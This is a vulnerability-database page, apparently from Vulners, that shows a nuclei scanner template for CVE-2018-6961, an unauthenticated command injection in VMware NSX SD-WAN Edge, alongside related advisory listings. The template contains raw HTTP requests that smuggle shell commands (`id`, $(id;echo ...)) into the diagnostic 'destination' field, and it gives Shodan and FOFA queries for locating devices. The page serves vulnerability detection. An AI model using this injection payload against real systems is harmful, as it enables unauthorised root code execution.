Lucene search
K

VMware NSX SD-WAN Edge - Command Injection

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 9 Views

Unauthenticated command injection in VMware NSX SD-WAN Edge web UI diagnostics prior to 3.1.2.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
VMware NSX SD-WAN Edge < 3.1.2 - Command Injection Exploit
3 Jul 201800:00
zdt
GithubExploit
Exploit for OS Command Injection in Vmware Nsx_Sd-Wan_By_Velocloud
8 Feb 201913:00
githubexploit
ATTACKERKB
CVE-2018-6961
11 Jun 201800:00
attackerkb
Arista
Security Advisory 0129
13 May 201800:00
arista
Circl
CVE-2018-6961
2 Jul 201800:00
circl
CISA KEV Catalog
VMware SD-WAN Edge by VeloCloud Command Injection Vulnerability
25 Mar 202200:00
cisa_kev
CNVD
VMware SD-WAN Edge Command Injection Vulnerability
5 Jun 201800:00
cnvd
Check Point Advisories
VMware NSX SD-WAN Edge Remote Code Execution (CVE-2018-6961)
16 Jul 201900:00
checkpoint_advisories
CVE
CVE-2018-6961
11 Jun 201822:00
cve
Cvelist
CVE-2018-6961
11 Jun 201822:00
cvelist
Rows per page
id: CVE-2018-6961

info:
  name: VMware NSX SD-WAN Edge - Command Injection
  author: D3nverNg,thewindghost
  severity: critical
  description: |
    VMware NSX SD-WAN Edge (formerly VeloCloud Edge) before 3.1.2 contains an unauthenticated command injection in the local web UI diagnostic tools (Ping/Traceroute). This template detects it reliably by injecting 'id', 'whoami', and a random marker.
  impact: |
    Successful exploitation allows unauthenticated remote code execution as root.
  remediation: |
    Upgrade to VMware SD-WAN Edge version 3.1.2 or later (diagnostic web UI component removed).
  reference:
    - https://www.vmware.com/security/advisories/VMSA-2018-0011.html
    - https://www.exploit-db.com/exploits/44959
    - https://nvd.nist.gov/vuln/detail/CVE-2018-6961
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2018-6961
    epss-score: 0.86431
    epss-percentile: 0.9971
    cwe-id: CWE-78
  metadata:
    verified: true
    max-request: 2
    vendor: vmware
    product: nsx_sd-wan_edge
    shodan-query: title:"VeloCloud"
    fofa-query: title="VeloCloud"
  tags: cve,cve2018,vmware,nsx,sd-wan,velocloud,rce,kev,vkev

variables:
  rand: "{{rand_text_alphanumeric(10)}}"

http:
  - raw:
      - |
        POST /scripts/ajaxPortal.lua HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        destination=8.8.8.8`id`&source=ge1&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic

      - |
        POST /scripts/ajaxPortal.lua HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        destination=8.8.8.8$(id;echo {{rand}})&source=ge1&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"status\":\"OK")'
          - 'contains(content_type, "application/json")'
        condition: and

      - type: dsl
        dsl:
          - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)"
          - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body) && contains(body, '{{rand}}')"
        condition: or

      - type: word
        part: body
        words:
          - "UNKNOWN_COMMAND"
          - "Invalid command"
        negative: true
# digest: 490a0046304402206873eb49a66ee92db3b651713c083c9f58d221ca9decb4b26f4e91540ec84af3022069f5d9e9f9556d17e5420915db1d4be7ac10a64c864fda9ebab7c407ac6aa637:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 26.8
CVSS 3.18.1
EPSS0.86431
SSVC
9